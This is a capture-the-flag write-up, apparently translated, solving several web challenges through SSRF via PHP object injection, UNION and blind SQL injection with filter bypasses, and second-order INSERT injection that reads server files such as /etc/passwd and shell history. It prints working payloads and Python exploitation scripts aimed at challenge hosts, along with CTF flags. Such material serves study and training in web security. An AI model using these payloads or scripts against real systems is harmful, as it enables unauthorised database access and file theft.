Fakebook

Intended solution

On the join page, registering an account shows a blog URL field, which suggests SSRF; after logging in the account page renders the blog contents, so it is almost certainly SSRF. A few protocols were tried without success, so the next step was a directory scan, which turned up robots.txt:

```
User-agent: *
Disallow: /user.php.bak
```

Download that source:

```php
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    // Fetches $url with curl. No CURLOPT_PROTOCOLS restriction: curl will happily
    // follow file://, gopher:// etc. if such a value ever reaches here.
    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    // The only check on the URL: an http(s) host name with a letters-only TLD.
    // A value written straight into the users table never passes through it.
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}
```

Testing shows that the `no` parameter of view.php is SQL-injectable:

```
?no=1 order by 4
normal

?no=1 order by 5
[*] query error! (Unknown column '5' in 'order clause')

?no=0 union select load_file("/var/www/html/flag.php"),2,3,4
no hack ~_~

?no=0+unIon/**/select/**/1,load_file('/var/www/html/flag.php'),1,1
Notice: unserialize(): Error at offset 0 of 1 bytes in /var/www/html/view.php on line 31
```
Dumping the database. One pitfall here: `union select` written as-is is blocked (the page answers `no hack ~_~`), so mixed case plus `/**/` in place of the space is used to get past the filter. The steps:

```
view.php?no=-6%20unIon/**/select%201,table_name,3,4%20from%20information_schema.tables%20where%20table_schema=database()
view.php?no=-6%20unIon/**/select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_schema=database()#
view.php?no=-6%20unIon/**/select%201,data,3,4%20from%20users#
```


The `data` column holds a PHP serialized object. Since the SSRF had not been used yet, the guess is that the backend unserializes `data`, takes the blog URL out of the object, fetches that URL and returns the body (the unserialize() notice above, triggered by the bare `1` placed in the union, shows that one of the selected columns is unserialized). So the PoC is built like this:

```php
<?php
class UserInfo{
    public $name = "";
    public $age = 0;
    public $blog = "";
}
$a = new UserInfo();
$a->name = "text";
$a->blog = "file:///var/www/html/flag.php";
echo serialize($a);
?>
```

```
/view.php?no=1 unIon/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"text";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
```
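The chain above, serialization, the regex that registration applies, and the injected row, as an added Python example (not part of the original writeup). It reproduces PHP serialize() for this class, ports isValidBlog() to show that a file:// URL could never have been stored through the form, and builds the view.php URL. The base URL and the assumption that the fourth column of view.php's SELECT is the serialized `data` column are assumptions taken from the payload above, not from the challenge source.

```python
import re
from urllib.parse import quote

# Assumptions (not from the challenge): the instance URL, and that the fourth of
# the four selected columns is the serialized `data` column.
BASE_URL = "http://example.node3.buuoj.cn"
TOTAL_COLUMNS = 4
DATA_COLUMN = 4

# The regex from isValidBlog() in user.php.bak, unchanged.
BLOG_RE = re.compile(
    r"^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$",
    re.IGNORECASE,
)


def php_str(s):
    # PHP serialize(): s:<length in bytes>:"<raw bytes>"; quotes are not escaped,
    # and the length counts bytes, not characters.
    return 's:%d:"%s";' % (len(s.encode("utf-8")), s)


def php_serialize_userinfo(name, age, blog):
    # O:<class name length>:"<class>":<property count>:{<key><value>...}
    # Property order follows the class declaration (name, age, blog); the
    # constructor casts age to int, so it serializes as i:<n>;.
    props = (
        php_str("name") + php_str(name)
        + php_str("age") + "i:%d;" % int(age)
        + php_str("blog") + php_str(blog)
    )
    return 'O:8:"UserInfo":3:{%s}' % props


def is_valid_blog(blog):
    # preg_match() returns 1/0; True means the registration form would accept the URL.
    return BLOG_RE.match(blog) is not None


def build_view_url(serialized, base_url=BASE_URL):
    # Mixed case plus /**/ instead of the space inside "union select" is what got
    # past the filter above; a negative `no` keeps the real row out of the result
    # so the unserialized object comes from our row only.
    cols = ["1"] * TOTAL_COLUMNS
    cols[DATA_COLUMN - 1] = "'%s'" % serialized
    query = "-1 unIon/**/select " + ",".join(cols)
    return "%s/view.php?no=%s" % (base_url, quote(query, safe=""))


if __name__ == "__main__":
    payload = php_serialize_userinfo("text", 0, "file:///var/www/html/flag.php")
    print(payload)
    print("form would accept file:// :", is_valid_blog("file:///var/www/html/flag.php"))
    print(build_view_url(payload))
```

The regex also rejects `http://127.0.0.1/` (the TLD must be letters), so neither the file:// read nor a loopback request is reachable through the registration form; both become reachable once the serialized object is supplied through the injection.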

Unintended solution

SQL injection with load_file

Local test:

```
MariaDB [test]> select load_file("/flag");
+--------------------+
| load_file("/flag") |
+--------------------+
| flag{asdczxafa}    |
+--------------------+
```

A script to brute-force the file one character at a time (binary search on each byte value):

```python
import requests
import string

url = 'http://6cd9d24d-628c-457e-9e44-bde9259bce69.node3.buuoj.cn/login.php'
letter = '{}{}0123456789_-{},()'.format(string.ascii_uppercase, string.ascii_lowercase, "{}")
r = None  # replaced by a logged-in session in __main__


def BiggerThanMid(payload, num):  # True if the byte being guessed is bigger than num
    payload = payload.format(num)
    content = r.get("http://6cd9d24d-628c-457e-9e44-bde9259bce69.node3.buuoj.cn/view.php?no=" + payload)
    # the row is only rendered when the injected if() evaluates to 1
    if "admin" in content.text.encode("utf-8").decode(content.apparent_encoding):
        return True
    else:
        return False


def BinaryInjection(payload):  # binary search over the byte value 1..255
    min = 1    # lowest candidate
    max = 255  # highest candidate
    while (max - min) > 1:
        mid = (max + min) // 2  # midpoint, rounded down
        if BiggerThanMid(payload, mid):
            min = mid  # bigger than the guess: raise the lower bound
        else:
            max = mid  # not bigger: lower the upper bound
    return max


def databaseLength():
    payload = "admin' and if(length(database())>{},1,0)#"  # length of database
    return BinaryInjection(payload)


# this function gets a name or the flag, one character at a time
def getxxxName(rawpayload, length=20):
    xxxName = ""
    for i in range(1, length):
        payload = rawpayload.format(i, "{}")
        xxxName += chr(BinaryInjection(payload))
        print(xxxName)
    return xxxName


if __name__ == "__main__":
    # alternative form: 1 and if(ascii(substr(load_file("var/www/html/flag.php"),{},1))<{},0,1)
    r = requests.session()
    r.post(url, {"username": "1",
                 "passwd": "1"
                 })
    # the whole `no` value is the if(): it evaluates to 1 (row shown) or 0 (no row)
    getLoadFile = 'if(ascii(substr(load_file("/var/www/html/flag.php"),{},1))>{},1,0)'
    TableName = getxxxName(getLoadFile, 80)
```

Result (the contents of flag.php):

```
$flag = "flag{5452d364-5bc7-4d2a-9257-1dcff9012004}";
```

Unfinish

  • Second-order injection

The challenge:


There is only a login page, so probe for a register.php registration page. It exists; register, log in and look around.


Analysis

Login takes an e-mail and a password, while registration also takes a username, and that username is displayed after login. So the username is a candidate for second-order injection.


Another observation: replaying the captured registration request keeps returning status 200, which could indicate an UPDATE injection; but the user information is never actually updated, so there is no UPDATE injection. The test therefore targets the username for second-order injection.

A successful registration returns 302 and redirects to login.php; a failed one only returns 200. So the payload is:

```
email=test@666.com&username=0'%2B(select hex(hex(database())))%2B'0&password=test
```


Decoding the result as hex twice gives the database name, web:

```
>>> "373736353632".decode('hex').decode('hex')   # Python 2
'web'
```

Why hex twice: hex() output contains the letters A-F, and MySQL's string-to-number conversion stops at the first character that is not a digit, so a single hex() would be cut off at the first letter. Hexing the hex string maps every 0-9/A-F character to 30-39/41-46, so the result is digits only and the whole value survives being added to '0'.


One more problem: after two rounds of hex the value is a long string containing only digits; when that string is converted to a number it becomes a DOUBLE and is displayed in scientific notation, so digits are lost:


So substr is used to take 10 characters at a time and add each piece to '0'; no digits are lost that way. A comma causes an error here, so the `substr('test' from 1 for 10)` form is used to get around it. The code to fetch the flag follows.
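The double-hex and 10-character-slice reasoning above, as an added Python example that is not in the original writeup. It emulates the two MySQL behaviours the trick depends on (the leading-digits cast, and the loss of precision once a digit string exceeds what a DOUBLE represents exactly), generates the username payloads in the comma-free `substr(... from N for 10)` form, and rejoins and decodes the slices. The `flag` table and the `select * from flag` subquery are taken from the script below; the sample secret is constructed.

```python
import re

WIDTH = 10  # characters per slice, as in substr(... from N for 10); keep it even


def double_hex(s):
    # MySQL hex(hex(s)): the inner hex() yields 0-9A-F, the outer one turns those
    # into 30-39 / 41-46, so the result is digits only.
    inner = s.encode("utf-8").hex().upper()
    return inner.encode("ascii").hex().upper()


def numeric_prefix(s):
    # MySQL's string-to-number cast reads leading digits and stops at anything else.
    return re.match(r"[0-9]*", s).group(0) or "0"


def plus_zero(s):
    # What '0' + '<s>' evaluates to: a DOUBLE, reduced here to its integer value.
    return int(float(numeric_prefix(s)))


def survives_plus_zero(s):
    # True when the digit string comes back from '0'+s with every digit intact.
    # Ten digits (< 2**53) always do; twenty digits generally do not.
    return numeric_prefix(s) == s and plus_zero(s) == int(s)


def slices(s, width=WIDTH):
    # Emulates substr(s from i*width+1 for width) for i = 0, 1, 2, ...
    # An even width means every slice starts with a '3' or '4' (never '0'),
    # so the numeric cast cannot strip leading zeros either.
    return [s[i:i + width] for i in range(0, len(s), width)]


def username_payloads(count=20, width=WIDTH):
    # One registration per slice; FROM ... FOR avoids the comma that broke the query.
    tpl = "0'+(select substr(hex(hex((select * from flag))) from {} for {}))+'0"
    return [tpl.format(i * width + 1, width) for i in range(count)]


def decode_double_hex(digits):
    return bytes.fromhex(bytes.fromhex(digits).decode("ascii")).decode("utf-8")


def recover(slices_seen):
    # Each slice is the digit string shown on one user's page; rejoin, decode twice.
    return decode_double_hex("".join(slices_seen))


if __name__ == "__main__":
    secret = "flag{constructed-sample}"  # constructed, not the real flag
    encoded = double_hex(secret)
    parts = slices(encoded)
    print(all(survives_plus_zero(p) for p in parts), recover(parts))
    print(survives_plus_zero(encoded))  # the whole string at once loses precision
    print(username_payloads(3))
```

`survives_plus_zero(double_hex("flag{"))` is already False: the 20-digit value 36363643363136373742 is not representable as a DOUBLE, which is exactly what the scientific-notation output above shows.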

First register 20 users by hand, each one bringing out a different slice of the data (scripted registration just would not work, although login was fine, odd...).


```python
import requests
import re

url = "http://111.198.29.45:30329/"
r = requests.session()
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
    "Referer": "http://111.198.29.45:30329/register.php",
    "Content-Type": "application/x-www-form-urlencoded",
    "Host": "111.198.29.45:30329",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
    "Connection": "close"
}
pattern = re.compile(r'name">\n(.*)<')


def payload(i):
    # Each registered user carries one 10-character slice of hex(hex(flag)) in its username.
    # A literal '+' is used here: requests percent-encodes form values itself, so a '%2B'
    # in this dict would have reached the server as '%252B', i.e. not as '+'.
    regist = {
        "email": "{}@a.a".format(i + 10),
        "username": "0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0".format(i * 10 + 1),
        "password": "a"
    }
    return regist


def hex_to_str(s):
    # every two hex characters become one character
    pattern = re.compile(r'[A-Z0-9]{2}')
    return ''.join([chr(i) for i in [int('0x' + str(b), 16) for b in pattern.findall(s)]])


registDict = [payload(i) for i in range(20)]
flag = ""
r.headers.update(headers)
try:
    for i in range(20):
        # log in as user i and read the slice its username brought out
        r.post(url + "login.php", data={"email": registDict[i]['email'], "password": registDict[i]['password']})
        cont = r.get(url + "index.php")
        res = pattern.search(cont.text)
        res = res.group(1).strip()
        flag = flag + res
        print(hex_to_str(hex_to_str(flag)))

# on failure, print the actual error
except requests.RequestException as e:
    print(e)
```

comment

  • git leak recovery
  • second-order injection

https://www.cnblogs.com/iamstudy/articles/wangding_4th_game_web_writeup.html

A directory scan finds .git. Download it with GitHacker (not GitHack); the PHP files it produces are incomplete, so look at the git history.

Files that were never committed, or that were hidden, can be recovered.

cd into the directory the script produced, then run the commands below (barring surprises):


  • Method 1

```
git log --reflog
git reset --hard af36ba2d86ee43cde7b95db513906975cb8ece03
```

(the hash is the one the first red line points to: run `git log --reflog` first, pick the suspicious commit, then restore it)

  • Method 2

```
git stash list | tee
git stash pop # or git stash apply
```

The recovered write_do.php:

```php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    switch ($_GET['do'])
    {
        case 'write':
            $category = addslashes($_POST['category']);
            $title = addslashes($_POST['title']);
            $content = addslashes($_POST['content']);
            $sql = "insert into board
                    set category = '$category',
                        title = '$title',
                        content = '$content'";
            $result = mysql_query($sql);
            header("Location: ./index.php");
            break;
        case 'comment':
            $bo_id = addslashes($_POST['bo_id']);
            $sql = "select category from board where id='$bo_id'";
            $result = mysql_query($sql);
            $num = mysql_num_rows($result);
            if($num>0){
                // category comes back from the database unescaped; addslashes()
                // only protected the first INSERT, not this one
                $category = mysql_fetch_array($result)['category'];
                $content = addslashes($_POST['content']);
                $sql = "insert into comment
                        set category = '$category',
                            content = '$content',
                            bo_id = '$bo_id'";
                $result = mysql_query($sql);
            }
            header("Location: ./comment.php?id=$bo_id");
            break;
        default:
            header("Location: ./index.php");
    }
}
else{
    header("Location: ./index.php");
}
?>
```

If $_SESSION['login'] != 'yes' the page redirects to login.php, and the login.php page carries a hint:


The name is zhangwei and the password is zhangweixxx; brute-forcing the last three characters gives zhangwei666. Once logged in, posts and comments can be made.

Key code:

```php
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
        set category = '$category',
            content = '$content',
            bo_id = '$bo_id'";
```

The category written into the comment comes straight from the board row that write stored earlier, which gives the second-order injection:

  1. In write, set the category field to 123',content=user(),/*

  2. Then on the comment page submit */# as the content to trigger it

The statement after concatenation is:

1
2
3
4
5
6
7
8
9
$sql = "insert into comment
set category = '123',content=user(),/*',
content = '*/#',
bo_id = '$bo_id'";

insert into comment
set category = '123',content=user(),/*',
content = '*/#',
bo_id = '$bo_id'


The value of user() ends up stored in the content column.

Another option is ON DUPLICATE KEY UPDATE, with the payload: `',content=database(),bo_id='1' ON DUPLICATE KEY UPDATE category='`

Listing the database's tables shows nothing flag-like:

```
123',content=(select group_concat(table_name) from information_schema.tables where table_schema=database()),/*
```

Next, use load_file() to read files from disk:

```
123',content=(select( load_file('/flag'))),/*
```

No flag there.

```
123',content=(select( load_file('/etc/passwd'))),/*
```


There is a www user; read that user's shell history:

1
2
3
4
5
6
7
8
123',content=(select( load_file('/home/www/.bash_history'))),/*
cd /tmp/
unzip html.zip
rm -f html.zip
cp -r html /var/www/
cd /var/www/html/
rm -f .DS_Store
service apache2 start

Only the copy under /var/www/html was deleted, so /tmp/html still contains the .DS_Store file:

```
123',content=(select( load_file('/tmp/html/.DS_Store'))),/*
```


Some characters do not come out intact, so hex-encode the file:

```
123',content=(select hex( load_file('/tmp/html/.DS_Store'))),/*
```

The hex dump returned:

00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000200000000100000040000000010000008000000001000001000000000100000200000000010000040000000000000000010000100000000001000020000000000100004000000000010000800000000001000100000000000100020000000000010004000000000001000800000000000100100000000000010020000000000001004000000000000100800000000000010100000000000001020000000000000104000000000000010800000000000001100000000000000120000000000000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001044453444200000001000000000000000000000000000000000000000000000002000000200000006000000000000000010000008000000001000001000000000100000200000000000000000200000800000018000000000000000001000020000000000100004000000000010000800000000001000100000000000100020000000000010004000000000001000800000000000100100000000000010020000000000001004000000000000100800000000000010100000000000001020000000000000104000000000000010800000000000001100000000000000120000000000000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

A script to decode it, de.py:

```python
import re

pattern = re.compile(r'[A-Z0-9]{2}')


def hex_to_str(s):
    # every two hex characters become one character
    return ''.join([chr(i) for i in [int('0x' + str(b), 16) for b in pattern.findall(s)]])


# raw = ""
# with open('raw', 'r') as f:
#     raw = f.readlines()
# raw = str(raw)
raw = "3C3F7068700A24666C6167203D2027666C61677B66396361316136622D396437382D313165382D393061332D6334623330316237623939627D273B0A3F3E0A"
print(hex_to_str(raw))
```


That reveals flag_8946e1ff1ee3e40f.php.

An online ASCII converter works as well.

The relevant part, pasted into Sublime:

```
 Bud1
bootstrapIlocblobF(ÿÿÿÿÿÿ comment.phpIlocblobÌ(ÿÿcssIlocblobR(ÿÿÿÿÿÿflag_8946e1ff1ee3e40f.phpIlocblobØ(ÿÿÿÿÿÿfontsIlocblobF˜ÿÿÿÿÿÿ index.phpIlocblob̘ÿÿjsIlocblobR˜ÿÿÿÿÿÿ login.phpIlocblobؘÿÿÿÿÿÿ mysql.phpIlocblobFÿÿÿÿÿÿvendorIlocblobÌÿÿÿÿÿÿ write_do.phpIlocblobRÿÿÿÿÿÿ
```
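Reading the file names out of the .DS_Store dump, as an added Python example that is not part of the original writeup. Instead of eyeballing the decoded bytes in an editor, it walks the record tails (`<4-byte character count><UTF-16BE name><4-byte structure id><data type tag>`) and pulls every name out together with the record kind. The sample bytes are constructed from the "Bud1" header and four of the Iloc/blob records visible in the dump above, without the B-tree bookkeeping between them; this is a heuristic scan over the record layout, not a full parser of the file's tree.

```python
import re
from typing import Iterator, List, Tuple

# Tail of every directory record: a 4-byte structure id (Iloc, bwsp, lsvp, ...)
# followed by the data type tag. The name precedes it as <4-byte char count><UTF-16BE>.
RECORD_TAIL = re.compile(rb"(?P<sid>[A-Za-z0-9]{4})(?P<dtype>blob|bool|long|shor|type|comp|dutc|ustr)")

# Constructed sample: the "Bud1" header and four Iloc/blob records copied from the
# dump above (bootstrap, comment.php, css, flag_8946e1ff1ee3e40f.php).
SAMPLE_DS_STORE = bytes.fromhex(
    "00000001" "42756431" "00001000" "00000800" "00001000" + "00" * 16
    + "00000009" "0062006F006F007400730074007200610070" "496C6F63" "626C6F62"
    + "00000010" "0000004600000028FFFFFFFFFFFF0000"
    + "0000000B" "0063006F006D006D0065006E0074002E007000680070" "496C6F63" "626C6F62"
    + "00000010" "000000CC0000002800000001FFFF0000"
    + "00000003" "006300730073" "496C6F63" "626C6F62"
    + "00000010" "0000015200000028FFFFFFFFFFFF0000"
    + "00000019" "0066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070"
    + "496C6F63" "626C6F62" "00000010" "000001D800000028FFFFFFFFFFFF0000"
)


def iter_records(blob: bytes) -> Iterator[Tuple[str, str, str]]:
    """Yield (file name, structure id, data type) for every record tail found."""
    for m in RECORD_TAIL.finditer(blob):
        end = m.start()  # the UTF-16BE name ends right before the structure id
        for n in range(1, 256):
            start = end - 4 - 2 * n
            if start < 0:
                break
            # A window inside the name itself reads 00 xx 00 yy and can never equal
            # a small n, so the first hit is the real length word.
            if int.from_bytes(blob[start:start + 4], "big") != n:
                continue
            try:
                name = blob[start + 4:end].decode("utf-16-be")
            except UnicodeDecodeError:
                break
            if name.isprintable():
                yield name, m.group("sid").decode("ascii"), m.group("dtype").decode("ascii")
            break


def extract_names(blob: bytes) -> List[str]:
    """Distinct file names, in the order their records appear."""
    names: List[str] = []
    for name, _sid, _dtype in iter_records(blob):
        if name not in names:
            names.append(name)
    return names


def names_from_hex_dump(text: str) -> List[str]:
    """Input as returned by hex(load_file(...)), possibly split across several lines."""
    return extract_names(bytes.fromhex("".join(text.split())))


if __name__ == "__main__":
    for rec in iter_records(SAMPLE_DS_STORE):
        print(rec)
    print(extract_names(SAMPLE_DS_STORE))
```

On the real dump, feeding the whole hex text to `names_from_hex_dump()` lists every entry of /tmp/html, which is how the flag_8946e1ff1ee3e40f.php name can be spotted without decoding the file into an editor.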


Read flag_8946e1ff1ee3e40f.php:

```
123',content=(select hex( load_file('/tmp/html/flag_8946e1ff1ee3e40f.php'))),/*
```

```
3C3F7068700A24666C6167203D2027666C61677B66396361316136622D396437382D313165382D393061332D6334623330316237623939627D273B0A3F3E0A
```

Decoding it with the script again gives:

```
<?php
$flag = 'flag{f9ca1a6b-9d78-11e8-90a3-c4b301b7b99b}';
?>
```


On BUUCTF, the flag was not accepted no matter how it was submitted...

